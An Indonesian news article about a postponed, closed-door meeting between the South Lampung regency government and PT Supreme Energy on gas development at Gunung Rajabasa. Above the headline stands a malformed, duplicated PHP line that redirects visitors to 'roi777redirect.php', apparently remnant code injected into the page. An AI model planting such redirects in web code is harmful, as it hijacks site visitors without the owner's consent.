header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Rapat tertutup, Tidak Hasilkan Poin Penting -
Rapat tertutup, Tidak Hasilkan Poin Penting

Pemkab Lamsel dan PT. Supreme Energy

TRANSLAMPUNG.COM, KALIANDA – Rapat pertemuan antara Pemerintah Kabupaten Lampung Selatan dengan pihak PT.Supreme Energy terkait pengelolaan bio gas Gunung Rajabasa Kalianda gagal dibahas dan ditunda.

Pasalnya, dalam rapat yang semestinya dihadiri Bupati tersebut tidak bisa membahas poin penting dan kebijakan kata yang bisa disepakati. Sebab, Bupati Lampung Selatan H.Zainudin Hasan sedang menghadiri acara Rakornas Jakstranas tentang pengelolaan sampah rumah tangga dan sampah sejenis sampah rumah tangga, yang berlangsung di Auditorium Gedung Manggala Wanabakti Senayan, Jakarta.

Staf Ahli bupati bidang Pemerintahan, Hukum dan Politik, Supriayanto Putro mengatakan dalam rapat tadi belum ada poin penting yang bisa dibahas tentang tindak lanjut dari pengelolaan gas Gunung Rajaba tersebut.

“Belum ada yang bisa dibahas mas, karena pak bupati masih di Jakarta. Ya intinya mereka (PT.Supreme Energy-red), bersilahturami. Nanti akan diagendakan ulang untuk bertemu dengan Bupati,” ujar Suprianto Putra, saat diwawancarai di halaman Masjid Agung, Kalianda, Selasa (3/4).

Sementara itu, Wakil Direktur PT.Supreme Energy, Priandanu ditemui usai rapat mengatakan pertemua tersebut untuk membahas persiapan untuk memulai kegiatan pengelolaan Gas di Gunung Rajabasa.

“Pertama kami datang ingin bersilahturami dengan pak bupati. Kemudian untuk membahas persiapan akan dimulai untuk kegaiatan PT.Supreme Energy. Ya cuma itu saja, karena bupatinya tidak ada, nanti akan kami agendakan ulang,” ucap dia singkat sambil berlalu meninggalkan para wartawan.

Berdasarkan informasi yang berhasil dihimpun, dari agenda kegiatan Bupati, Selasa (3/4) rapat tersebut berlangsung sekitar jam 10.00 WIB menerima Audiensi PT.Supreme Energy di Ruang rapat Bupati Lamsel yang tadinya akan dipimpin Bupati, namun Staf Ahli Bupati Bidang Pemerintahan, Hukum dan Politik. Sedangkan SKPD yang diundang yakni Plt.Staf Ahli Bupati Bid.Ekobang dan Kemasyarakatan, Kepala Bappeda, Kepala Balitbang, Kadis LHD, Kadis PMPPTSP, Plt. Kadis Perumahan dan Permukiman, Kadis Perindag, Plt. Kadis TPH dan Perkebunan. Selanjutnya, Camat Rajabasa, Camat Bakauheni, Plt. Camat Penengahan, Camat Kalianda, Koordinator Staf Khusus.

Namun sangat disayangkan, rapat tersebut sangat tertutup sehingga para awak media yang biasa meliput di Pemkab Lamsel tidak ikut masuk kedalam ruangan. (jhn/hkw)

News Reporter